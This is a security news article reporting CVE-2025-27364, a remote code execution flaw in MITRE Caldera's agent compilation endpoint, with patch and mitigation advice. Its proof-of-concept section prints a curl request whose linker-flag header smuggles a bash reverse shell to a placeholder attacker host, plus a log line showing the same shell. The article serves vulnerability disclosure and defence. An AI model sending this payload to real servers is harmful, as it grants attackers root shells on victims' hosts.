Sunday, May 25, 2025
HomeCVE/vulnerabilityCritical RCE Vulnerability in MITRE Caldera – Proof of Concept Released

Critical RCE Vulnerability in MITRE Caldera – Proof of Concept Released

Published on

SIEM as a Service

Follow Us on Google News

A critical remote code execution (RCE) vulnerability has been uncovered in MITRE Caldera, a widely used adversarial emulation framework.

The flaw (CVE-2025-27364) affects all versions prior to commit 35bc06e, potentially exposing systems running Caldera servers to unauthenticated attacks.

Attackers can exploit this vulnerability by abusing dynamic compilation features in Caldera’s Sandcat and Manx agents, leading to arbitrary command execution on the host machine.

- Advertisement - Google News

MITRE has released patches urging immediate updates to versions v5.1.0 or newer.

Technical Analysis of the Vulnerability

The vulnerability stems from insufficient input sanitization in Caldera’s agent compilation process.

Caldera dynamically generates Sandcat and Manx agents—lightweight implants designed to execute commands during cybersecurity exercises.

These agents are compiled on-the-fly using user-supplied parameters passed via HTTP headers. While this flexibility aids red team operations, it inadvertently introduced a dangerous attack surface.

Dynamic Compilation and Command Injection

The compilation workflow involves a Go-based function (compile_go()) that processes linker flags (ldflags) from incoming requests.

Although Caldera’s code uses subprocess.check_output() without shell=True—a practice that typically mitigates shell injection—the subsequent handling of ldflags proved risky.

Attackers can manipulate these flags to hijack the compiler’s external linker configuration, ultimately leading to arbitrary code execution.

Simple Command Injection
Simple Command Injection

Key to the exploit is the -wrapper flag in GCC, which allows specifying a program to wrap subprocess calls.

By setting -extld=gcc and appending -wrapper with a malicious command (e.g., python3 -c ‘…’), attackers bypass Caldera’s security controls.

This technique exploits the server’s dependencies (Go, Python, GCC) to execute payloads directly on the host.

CVE-2025-27364 Details

  • CVE ID: CVE-2025-27364
  • CVSS Score: 9.8 (Critical)
  • Affected Versions: All Caldera versions prior to commit 35bc06e
  • Patch: Upgrade to Caldera v5.1.0+ or apply commit 35bc06e
  • Attack Vector: Remote, unauthenticated
  • Impact: Full system compromise via RCE

The vulnerability was discovered by security researcher Dawid Kulikowski, who reported it through MITRE’s coordinated disclosure process.

Running go tool link returns

MITRE has credited Kulikowski for his findings and emphasized the importance of community-driven security collaboration.

Proof of Concept (PoC)

The following curl command demonstrates exploitability by triggering a reverse shell on the Caldera server:

curl -X POST http://<caldera-server>:8888/file/compile \ 

-H "X-Request-Hash: arbitrary" \ 

-H "X-Goos: linux" \ 

-H "X-Goarch: amd64" \ 

-H "X-Ldflags: -extld=gcc -wrapper python3,-c,import os;os.system(\"bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1'\")"

Successful exploitation results in the Caldera server executing the embedded Python script, granting attackers a reverse shell with root privileges.

Researchers observed the following output on a compromised server during testing:

... 

# Compilation command: go build -ldflags "... -extld=gcc -wrapper python3,-c,import os;os.system(\"bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'\")" 

# Reverse shell connection established from 10.0.0.1:4444

Mitigation and Recommendations

MITRE has issued an urgent advisory recommending the following actions:

  1. Immediate Upgrade: Update Caldera to v5.1.0 or later, which restricts linker flag modifications and validates compilation parameters.
  2. Network Segmentation: Isolate Caldera servers from sensitive environments to limit lateral movement.
  3. Dependency Hardening: Remove unnecessary build tools (e.g., GCC) from production systems where Caldera operates.

Organizations leveraging Caldera for training or testing should audit their instances for signs of exploitation, including unexpected processes or network connections originating from Caldera hosts.

CVE-2025-27364 underscores the risks of dynamic code generation in defensive tools, highlighting how attacker-controlled parameters can cascade into systemic failures.

MITRE’s rapid response sets a precedent for open-source project maintenance, but administrators must remain vigilant.

As adversarial emulation platforms grow in complexity, continuous security reviews of their codebases and dependencies will be critical to preventing similar vulnerabilities.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Zero-Trust Policy Bypass Enables Exploitation of Vulnerabilities and Manipulation of NHI Secrets

A new project has exposed a critical attack vector that exploits protocol vulnerabilities to...

Threat Actor Sells Burger King Backup System RCE Vulnerability for $4,000

A threat actor known as #LongNight has reportedly put up for sale remote code...

Chinese Nexus Hackers Exploit Ivanti Endpoint Manager Mobile Vulnerability

Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager...

Hackers Target macOS Users with Fake Ledger Apps to Deploy Malware

Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Zero-Trust Policy Bypass Enables Exploitation of Vulnerabilities and Manipulation of NHI Secrets

A new project has exposed a critical attack vector that exploits protocol vulnerabilities to...

Threat Actor Sells Burger King Backup System RCE Vulnerability for $4,000

A threat actor known as #LongNight has reportedly put up for sale remote code...

Chinese Nexus Hackers Exploit Ivanti Endpoint Manager Mobile Vulnerability

Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager...